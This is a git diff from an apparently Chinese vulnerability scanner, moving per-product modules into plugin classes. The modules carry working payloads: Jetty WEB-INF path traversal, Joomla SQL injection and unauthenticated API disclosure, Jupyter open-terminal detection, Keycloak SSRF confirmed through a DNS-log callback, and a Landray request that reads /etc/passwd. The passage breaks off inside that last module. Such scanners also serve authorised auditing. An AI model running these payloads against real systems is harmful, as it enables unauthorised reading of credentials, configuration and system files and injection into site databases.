-    {'path': '..%00/WEB-INF/web.xml'},
-]
-
-def cve_2021_34429_scan(clients):
-    ''' CVE-2021-28164的变种和绕过
-            基于 Unicode 的 URL 编码     /%u002e/WEB-INF/web.xml
-            \0和 .                      /.%00/WEB-INF/web.xml
-            \0和 ..                     /a/b/..%00/WEB-INF/web.xml
-    '''
-    hackClient = clients.get('hackClient')
-    
-    vul_info = {
-        'app_name': 'Jetty',
-        'vul_type': 'DSinfo',
-        'vul_id': 'CVE-2021-34429',
-    }
-
-    for payload in cve_2021_34429_payloads:
-        path = payload['path']
-
-        res = hackClient.request(
-            'get',
-            path,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (('<web-app>' in res.text)
-            and ('<display-name>' in res.text)
-            and ('<!DOCTYPE web-app PUBLIC' in res.text)
-            and ('Sun Microsystems' in res.text)
-            and ('DTD Web Application' in res.text)
-        ):
-            results = {
-                'Target': res.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Jetty/jetty-cve-2021-28164-dsinfo.py b/payloads/Jetty/jetty-cve-2021-28164-dsinfo.py
new file mode 100644
index 0000000..21cde5e
--- /dev/null
+++ b/payloads/Jetty/jetty-cve-2021-28164-dsinfo.py
@@ -0,0 +1,60 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+jetty 模糊路径信息泄露
+    CVE-2021-28164
+        Payload: https://vulhub.org/#/environments/jetty/CVE-2021-28164/
+
+默认允许请求的url中包含%2e或者%2e%2e以访问 WEB-INF 目录中的受保护资源
+    例如请求 /context/%2e/WEB-INF/web.xml可以检索 web.xml 文件
+'''
+
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': '%2e/WEB-INF/web.xml'},
+            {'path': '%2e%2e/WEB-INF/web.xml'},
+        ]
+    
+    def POC(self, clients):
+        hackClient = clients.get('hackClient')
+        
+        vul_info = {
+            'app_name': 'Jetty',
+            'vul_type': 'DSinfo',
+            'vul_id': 'CVE-2021-28164',
+        }
+        
+        for payload in self.payloads:
+            path = payload['path']
+
+            res = hackClient.request(
+                'get',
+                path,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (('<web-app>' in res.text)
+                and ('<display-name>' in res.text)
+                and ('<!DOCTYPE web-app PUBLIC' in res.text)
+                and ('Sun Microsystems' in res.text)
+                and ('DTD Web Application' in res.text)
+            ):
+                results = {
+                    'Target': res.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Jetty/jetty-cve-2021-28169-dsinfo.py b/payloads/Jetty/jetty-cve-2021-28169-dsinfo.py
new file mode 100644
index 0000000..41561e7
--- /dev/null
+++ b/payloads/Jetty/jetty-cve-2021-28169-dsinfo.py
@@ -0,0 +1,62 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+jetty Utility Servlets ConcatServlet 双重解码信息泄露
+    CVE-2021-28169
+        Payload: https://vulhub.org/#/environments/jetty/CVE-2021-28169/
+
+在版本9.4.40、10.0.2、11.0.2 之前,
+    ConcatServlet和WelcomeFilterJetty Servlet中的类受到"双重解码"错误的影响
+'''
+
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': 'static?/%2557EB-INF/web.xml'},
+            {'path': 'concat?/%2557EB-INF/web.xml'},
+            {'path': '?/%2557EB-INF/web.xml'},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'Jetty',
+            'vul_type': 'DSinfo',
+            'vul_id': 'CVE-2021-28169',
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+
+            res = client.request(
+                'get',
+                path,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (('<web-app>' in res.text)
+                and ('<display-name>' in res.text)
+                and ('<!DOCTYPE web-app PUBLIC' in res.text)
+                and ('Sun Microsystems' in res.text)
+                and ('DTD Web Application' in res.text)
+            ):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Jetty/jetty-cve-2021-34429-dsinfo.py b/payloads/Jetty/jetty-cve-2021-34429-dsinfo.py
new file mode 100644
index 0000000..908a13c
--- /dev/null
+++ b/payloads/Jetty/jetty-cve-2021-34429-dsinfo.py
@@ -0,0 +1,63 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+jetty 模糊路径信息泄露
+    CVE-2021-34429
+        Payload: https://vulhub.org/#/environments/jetty/CVE-2021-34429/
+
+CVE-2021-28164的变种和绕过
+    基于 Unicode 的 URL 编码     /%u002e/WEB-INF/web.xml
+    \0和 .                      /.%00/WEB-INF/web.xml
+    \0和 ..                     /a/b/..%00/WEB-INF/web.xml
+'''
+
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': '%u002e/WEB-INF/web.xml'},
+            {'path': '.%00/WEB-INF/web.xml'},
+            {'path': '..%00/WEB-INF/web.xml'},
+        ]
+    
+    def POC(self, clients):
+        hackClient = clients.get('hackClient')
+        
+        vul_info = {
+            'app_name': 'Jetty',
+            'vul_type': 'DSinfo',
+            'vul_id': 'CVE-2021-34429',
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+
+            res = hackClient.request(
+                'get',
+                path,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (('<web-app>' in res.text)
+                and ('<display-name>' in res.text)
+                and ('<!DOCTYPE web-app PUBLIC' in res.text)
+                and ('Sun Microsystems' in res.text)
+                and ('DTD Web Application' in res.text)
+            ):
+                results = {
+                    'Target': res.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Jetty/main.py b/payloads/Jetty/main.py
deleted file mode 100644
index d17f507..0000000
--- a/payloads/Jetty/main.py
+++ /dev/null
@@ -1,44 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-Eclipse Jetty 是一个 Java Web 服务器和 Java Servlet 容器。 
-    Jetty扫描类: 
-        1. jetty 模糊路径信息泄露
-            CVE-2021-28164
-                Payload: https://vulhub.org/#/environments/jetty/CVE-2021-28164/
-
-        2. jetty Utility Servlets ConcatServlet 双重解码信息泄露
-            CVE-2021-28169
-                Payload: https://vulhub.org/#/environments/jetty/CVE-2021-28169/
-
-        3. jetty 模糊路径信息泄露
-            CVE-2021-34429
-                Payload: https://vulhub.org/#/environments/jetty/CVE-2021-34429/
-
-file:///etc/passwd
-file:///C:/Windows/System32/drivers/etc/hosts
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.Jetty.cve_2021_28164 import cve_2021_28164_scan
-from payloads.Jetty.cve_2021_28169 import cve_2021_28169_scan
-from payloads.Jetty.cve_2021_34429 import cve_2021_34429_scan
-
-class Jetty():
-    def __init__(self):
-        self.app_name = 'Jetty'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2021_28164_scan, clients=clients),
-            thread(target=cve_2021_28169_scan, clients=clients),
-            thread(target=cve_2021_34429_scan, clients=clients)
-        ]
-
-jetty = Jetty()
diff --git a/payloads/Joomla/cve_2017_8917.py b/payloads/Joomla/cve_2017_8917.py
deleted file mode 100644
index 1761a1d..0000000
--- a/payloads/Joomla/cve_2017_8917.py
+++ /dev/null
@@ -1,49 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import md5, random_int_1
-
-cve_2017_8917_payloads = [
-    {'path': 'index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x7e,concat(0x7e,md5({RANDOMNUM})),0x7e)'},
-    {'path': 'Joomla/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x7e,concat(0x7e,md5({RANDOMNUM})),0x7e)'},
-]
-
-def cve_2017_8917_scan(clients):
-    ''' 这个漏洞出现在3.7.0新引入的一个组件“com_fields”
-            这个组件任何人都可以访问，无需登陆验证
-            由于对请求数据过滤不严导致sql注入，sql注入对导致数据库中的敏感信息泄漏
-                例如用户的密码hash以及登陆后的用户的session
-                （如果是获取到登陆后管理员的session，那么整个网站的后台系统可能被控制）'''
-
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'Joomla',
-        'vul_type': 'SQLinject',
-        'vul_id': 'CVE-2017-8917',
-    }
-    
-    for payload in cve_2017_8917_payloads:
-        random_num = random_int_1()                # * 随机数字
-
-        path = payload['path'].format(RANDOMNUM=random_num)
-
-        res = client.request(
-            'get',
-            path,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        md = md5(str(random_num), 30)   # * 计算随机数字的md5值, 取30位(0-29), 因为报错注入的符号 会占用位置
-        
-        if (md in res.text):            # * 如果计算的md5值, 在响应包的回显中找到了, 说明SQL注入的md5()函数执行了, 存在漏洞
-            results = {
-                'Target': res.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Joomla/joomla-cve-2017-8917-sqlinject.py b/payloads/Joomla/joomla-cve-2017-8917-sqlinject.py
new file mode 100644
index 0000000..a67b347
--- /dev/null
+++ b/payloads/Joomla/joomla-cve-2017-8917-sqlinject.py
@@ -0,0 +1,71 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Joomla3.7 Core com_fields组件SQL注入
+    CVE-2017-8917
+        Payload: https://blog.csdn.net/BROTHERYY/article/details/109155428
+
+这个漏洞出现在3.7.0新引入的一个组件“com_fields”
+    这个组件任何人都可以访问，无需登陆验证
+    由于对请求数据过滤不严导致sql注入，sql注入对导致数据库中的敏感信息泄漏
+        例如用户的密码hash以及登陆后的用户的session
+        （如果是获取到登陆后管理员的session，那么整个网站的后台系统可能被控制）
+
+
+
+
+暂无. Joomla提权漏洞 导致RCE
+    CVE-2020-11890
+        Payload: https://github.com/HoangKien1020/CVE-2020-11890
+'''
+
+from lib.tool.md5 import md5, random_int_1
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': 'index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x7e,concat(0x7e,md5({RANDOMNUM})),0x7e)'},
+            {'path': 'Joomla/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x7e,concat(0x7e,md5({RANDOMNUM})),0x7e)'},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'Joomla',
+            'vul_type': 'SQLinject',
+            'vul_id': 'CVE-2017-8917',
+        }
+        
+        for payload in self.payloads:
+            random_num = random_int_1()                # * 随机数字
+
+            path = payload['path'].format(RANDOMNUM=random_num)
+
+            res = client.request(
+                'get',
+                path,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            md = md5(str(random_num), 30)   # * 计算随机数字的md5值, 取30位(0-29), 因为报错注入的符号 会占用位置
+            
+            if (md in res.text):            # * 如果计算的md5值, 在响应包的回显中找到了, 说明SQL注入的md5()函数执行了, 存在漏洞
+                results = {
+                    'Target': res.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Joomla/cve_2023_23752.py b/payloads/Joomla/joomla-cve-2023-23752-unauth.py
similarity index 76%
rename from payloads/Joomla/cve_2023_23752.py
rename to payloads/Joomla/joomla-cve-2023-23752-unauth.py
index b175ba6..a5b61e3 100644
--- a/payloads/Joomla/cve_2023_23752.py
+++ b/payloads/Joomla/joomla-cve-2023-23752-unauth.py
@@ -1,53 +1,74 @@
 #!/usr/bin/env python3
 # -*- coding:utf-8 -*-
 
-cve_2023_23752_payloads = [
-    {'path': 'api/index.php/v1/config/application?public=true'},
-    {'path': 'api/index.php/v1/users?public=true'},
-    {'path': 'index.php/v1/config/application?public=true'},
-    {'path': 'index.php/v1/users?public=true'},
-    {'path': 'v1/config/application?public=true'},
-    {'path': 'v1/users?public=true'},
-]
+'''
+Joomla webservice 接口未授权访问漏洞
+    CVE-2023-23752
+        Payload: https://xz.aliyun.com/t/12175
+
+变量覆盖导致的越权 -> 未授权访问
+'''
 
-def cve_2023_23752_scan(clients):
-    ''' 变量覆盖导致的越权 -> 未授权访问 '''
-    client = clients.get('reqClient')
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': 'api/index.php/v1/config/application?public=true'},
+            {'path': 'api/index.php/v1/users?public=true'},
+            {'path': 'index.php/v1/config/application?public=true'},
+            {'path': 'index.php/v1/users?public=true'},
+            {'path': 'v1/config/application?public=true'},
+            {'path': 'v1/users?public=true'},
+        ]
     
-    vul_info = {
-        'app_name': 'Joomla',
-        'vul_type': 'unAuth',
-        'vul_id': 'CVE-2023-23752',
-    }
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'Joomla',
+            'vul_type': 'unAuth',
+            'vul_id': 'CVE-2023-23752',
+        }
+        
+        for payload in self.payloads:
+            path = payload['path']
+
+            res = client.request(
+                'get',
+                path,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (('"type":"application"' in res.text
+                    and '"attributes":{"password":"' in res.text
+                    and '"attributes":{"user":"' in res.text)
+                or (
+                    '"type":"users"' in res.text
+                    and '"attributes":{"id":' in res.text
+                    and '"meta":{"total-pages":' in res.text
+                )
+            ):
+                results = {
+                    'Target': res.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
     
-    for payload in cve_2023_23752_payloads:
-        path = payload['path']
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
+
+
 
-        res = client.request(
-            'get',
-            path,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
 
-        if (('"type":"application"' in res.text
-                and '"attributes":{"password":"' in res.text
-                and '"attributes":{"user":"' in res.text)
-            or (
-                '"type":"users"' in res.text
-                and '"attributes":{"id":' in res.text
-                and '"meta":{"total-pages":' in res.text
-            )
-        ):
-            results = {
-                'Target': res.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
 
 # * 更多API
 '''
diff --git a/payloads/Joomla/main.py b/payloads/Joomla/main.py
deleted file mode 100644
index 7510fb4..0000000
--- a/payloads/Joomla/main.py
+++ /dev/null
@@ -1,44 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-Joomla是一套全球知名的内容管理系统（CMS），使用PHP语言加上MySQL数据库所开发
-可以在Linux、Windows、MacOSX等各种不同的平台上运行
-
-    Joomla扫描类: 
-        暂无. Joomla提权漏洞 导致RCE
-            CVE-2020-11890
-                Payload: https://github.com/HoangKien1020/CVE-2020-11890
-
-        2. Joomla3.7 Core com_fields组件SQL注入
-            CVE-2017-8917
-                Payload: https://blog.csdn.net/BROTHERYY/article/details/109155428
-
-        3. Joomla webservice 接口未授权访问漏洞
-            CVE-2023-23752
-                Payload: https://xz.aliyun.com/t/12175
-
-file:///etc/passwd
-file:///C:/Windows/System32/drivers/etc/hosts
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.Joomla.cve_2017_8917 import cve_2017_8917_scan
-from payloads.Joomla.cve_2023_23752 import cve_2023_23752_scan
-
-class Joomla():
-    def __init__(self):
-        self.app_name = 'Joomla'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2017_8917_scan, clients=clients),
-            thread(target=cve_2023_23752_scan, clients=clients),
-        ]
-
-joomla = Joomla()
diff --git a/payloads/Jupyter/jupyter-unauth.py b/payloads/Jupyter/jupyter-unauth.py
new file mode 100644
index 0000000..ea6b123
--- /dev/null
+++ b/payloads/Jupyter/jupyter-unauth.py
@@ -0,0 +1,61 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Jupyter 未授权访问
+    暂无编号
+        Payload: https://vulhub.org/#/environments/jupyter/notebook-rce/
+
+如果管理员没有为Jupyter Notebook配置密码, 将导致未授权访问, 
+    游客可在其中创建一个console并执行任意Python代码和命令
+'''
+
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': 'terminals/0'},
+            {'path': '0'},
+            {'path': ''},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'Jupyter',
+            'vul_type': 'unAuth',
+            'vul_id': 'jupyter-unauthorized',
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+
+            res = client.request(
+                'get',
+                path,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if ((('<body class="terminal-app' in res.text)
+                    and ('data-ws-path="terminals/websocket/0"' in res.text)
+                    and ('terminal/js/main.min.js' in res.text))
+                or (('data-terminals-available="True"' in res.text)
+                    and ('li role="presentation" id="new-terminal"' in res.text))
+            ):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Jupyter/main.py b/payloads/Jupyter/main.py
deleted file mode 100644
index b2328aa..0000000
--- a/payloads/Jupyter/main.py
+++ /dev/null
@@ -1,32 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-Jupyter Notebook (此前被称为 IPython notebook) 是一个交互式笔记本, 支持运行 40 多种编程语言
-    Jupyter扫描类: 
-        Jupyter 未授权访问
-            暂无编号
-                Payload: https://vulhub.org/#/environments/jupyter/notebook-rce/
-
-file:///etc/passwd
-file:///C:/Windows/System32/drivers/etc/hosts
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.Jupyter.unauth import unauth_scan
-
-class Jupyter():
-    def __init__(self):
-        self.app_name = 'Jupyter'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=unauth_scan, clients=clients)
-        ]
-
-jupyter = Jupyter()
diff --git a/payloads/Jupyter/unauth.py b/payloads/Jupyter/unauth.py
deleted file mode 100644
index 266724b..0000000
--- a/payloads/Jupyter/unauth.py
+++ /dev/null
@@ -1,45 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-jupyter_unauthorized_payloads = [
-    {'path': 'terminals/0'},
-    {'path': '0'},
-    {'path': ''},
-]
-
-def unauth_scan(clients):
-    ''' 如果管理员没有为Jupyter Notebook配置密码, 将导致未授权访问, 
-        游客可在其中创建一个console并执行任意Python代码和命令
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'Jupyter',
-        'vul_type': 'unAuthorized',
-        'vul_id': 'jupyter-unauthorized',
-    }
-
-    for payload in jupyter_unauthorized_payloads:
-        path = payload['path']
-
-        res = client.request(
-            'get',
-            path,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if ((('<body class="terminal-app' in res.text)
-                and ('data-ws-path="terminals/websocket/0"' in res.text)
-                and ('terminal/js/main.min.js' in res.text))
-            or (('data-terminals-available="True"' in res.text)
-                and ('li role="presentation" id="new-terminal"' in res.text))
-        ):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Keycloak/cve_2020_10770.py b/payloads/Keycloak/cve_2020_10770.py
deleted file mode 100644
index 5251c58..0000000
--- a/payloads/Keycloak/cve_2020_10770.py
+++ /dev/null
@@ -1,49 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.api.dns import dns
-from lib.tool.md5 import random_md5
-from time import sleep
-
-cve_2020_10770_payloads = [
-    {'path': 'auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=DNSDOMAIN'},
-    {'path': 'realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=DNSDOMAIN'},
-    {'path': 'master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=DNSDOMAIN'},
-    {'path': 'protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=DNSDOMAIN'},
-    {'path': 'openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=DNSDOMAIN'},
-]
-
-def cve_2020_10770_scan(clients):
-    ''' 强制目标服务器使用OIDC参数请求request_uri调用未经验证的URL '''
-    client = clients.get('reqClient')
-    sessid = '4a397cf8261c330c8e8c8f584b1b647a'
-    
-    vul_info = {
-        'app_name': 'Keycloak',
-        'vul_type': 'SSRF',
-        'vul_id': 'CVE-2020-10770',
-    }
-
-    for payload in cve_2020_10770_payloads:                     # * Payload
-        md = random_md5()                                       # * 随机md5值, 8位
-        dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
-
-        path = payload['path'].replace('DNSDOMAIN', dns_domain) # * Path
-
-        res = client.request(
-            'get',
-            path,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        sleep(3)                                                    # * dns查询可能较慢, 等一会
-        if ((res.status_code == 400) and (dns.result(md, sessid))):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None            
diff --git a/payloads/Keycloak/keycloak-cve-2020-10770-ssrf.py b/payloads/Keycloak/keycloak-cve-2020-10770-ssrf.py
new file mode 100644
index 0000000..20424cd
--- /dev/null
+++ b/payloads/Keycloak/keycloak-cve-2020-10770-ssrf.py
@@ -0,0 +1,63 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+''' 该POC没有经过实际环境验证(暂未找到漏洞环境, 还没测试POC准确性)
+Keycloak SSRF
+    CVE-2020-10770
+        Payload: AWVS scanner
+
+强制目标服务器使用OIDC参数请求request_uri调用未经验证的URL
+'''
+
+from lib.api.dns import dns
+from lib.tool.md5 import random_md5
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': 'auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=DNSDOMAIN'},
+            {'path': 'realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=DNSDOMAIN'},
+            {'path': 'master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=DNSDOMAIN'},
+            {'path': 'protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=DNSDOMAIN'},
+            {'path': 'openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=DNSDOMAIN'},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        sessid = '4a397cf8261c330c8e8c8f584b1b647a'
+        
+        vul_info = {
+            'app_name': 'Keycloak',
+            'vul_type': 'SSRF',
+            'vul_id': 'CVE-2020-10770',
+        }
+
+        for payload in self.payloads:                               # * Payload
+            md = random_md5()                                       # * 随机md5值, 8位
+            dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
+
+            path = payload['path'].replace('DNSDOMAIN', dns_domain) # * Path
+
+            res = client.request(
+                'get',
+                path,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if ((res.status_code == 400) and (dns.result(md, sessid))):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None            
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Keycloak/main.py b/payloads/Keycloak/main.py
deleted file mode 100644
index 13fc172..0000000
--- a/payloads/Keycloak/main.py
+++ /dev/null
@@ -1,28 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-''' 该POC没有经过实际环境验证(暂未找到漏洞环境, 还没测试POC准确性)
-
-    Keycloak扫描类: 
-        Keycloak SSRF
-            CVE-2020-10770
-                Payload: Awvs scanner
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.Keycloak.cve_2020_10770 import cve_2020_10770_scan
-
-class Keycloak():
-    def __init__(self):
-        self.app_name = 'Keycloak'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2020_10770_scan, clients=clients)
-        ]
-
-keycloak = Keycloak()
\ No newline at end of file
diff --git a/payloads/Kindeditor/cve_2018_18950.py b/payloads/Kindeditor/cve_2018_18950.py
deleted file mode 100644
index 6ecb8a7..0000000
--- a/payloads/Kindeditor/cve_2018_18950.py
+++ /dev/null
@@ -1,40 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-cve_2018_18950_payloads = [
-    {'path': 'php/file_manager_json.php?path=/'},
-]
-
-def cve_2018_18950_scan(clients):
-    ''' KindEditor 3.4.2/3.5.5版本中的php/file_manager_json.php文件存在目录遍历漏洞, 
-        远程攻击者可借助"path"参数利用该漏洞浏览文件
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'Kindeditor',
-        'vul_type': 'File-Read',
-        'vul_id': 'CVE-2018-18950',
-    }
-
-    for payload in cve_2018_18950_payloads:
-        path = payload['path']
-
-        res = client.request(
-            'get',
-            path,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-        
-        # * 还未完成
-        if (False):
-            results = {
-                'Target': target,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Kindeditor/main.py b/payloads/Kindeditor/main.py
deleted file mode 100644
index 8afcdeb..0000000
--- a/payloads/Kindeditor/main.py
+++ /dev/null
@@ -1,31 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-''' 还没写好
-KindEditor是一套开源的HTML可视化编辑器
-    Kindeditor扫描类: 
-        Kindeditor 目录遍历
-            CVE-2018-18950
-                Payload: https://baizesec.github.io/bylibrary/%E6%BC%8F%E6%B4%9E%E5%BA%93/02-%E7%BC%96%E8%BE%91%E5%99%A8%E6%BC%8F%E6%B4%9E/Kindeditor/KindEditor%203.4.2%263.5.5%E5%88%97%E7%9B%AE%E5%BD%95%E6%BC%8F%E6%B4%9E/
-
-file:///etc/passwd
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.Kindeditor.cve_2018_18950 import cve_2018_18950_scan
-
-class Kindeditor():
-    def __init__(self):
-        self.app_name = 'Kindeditor'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2018_18950_scan, clients=clients)
-        ]
-
-kindeditor = Kindeditor()
diff --git a/payloads/Landray/cnvd_2021_28277.py b/payloads/Landray/cnvd_2021_28277.py
deleted file mode 100644
index 118bec5..0000000
--- a/payloads/Landray/cnvd_2021_28277.py
+++ /dev/null
@@ -1,107 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool import check
-
-cnvd_2021_28277_payloads = [
-    {
-        'path': 'sys/ui/extend/varkind/custom.jsp',
-        'data': 'var={"body":{"file":"file:///etc/passwd"}}'
-    },
-    {
-        'path': 'sys/ui/extend/varkind/custom.jsp',
-        'data': 'var={"body":{"file":"file://C:/Windows/System32/drivers/etc/hosts"}}'
-    },
-    {
-        'path': 'sys/ui/extend/varkind/custom.jsp',
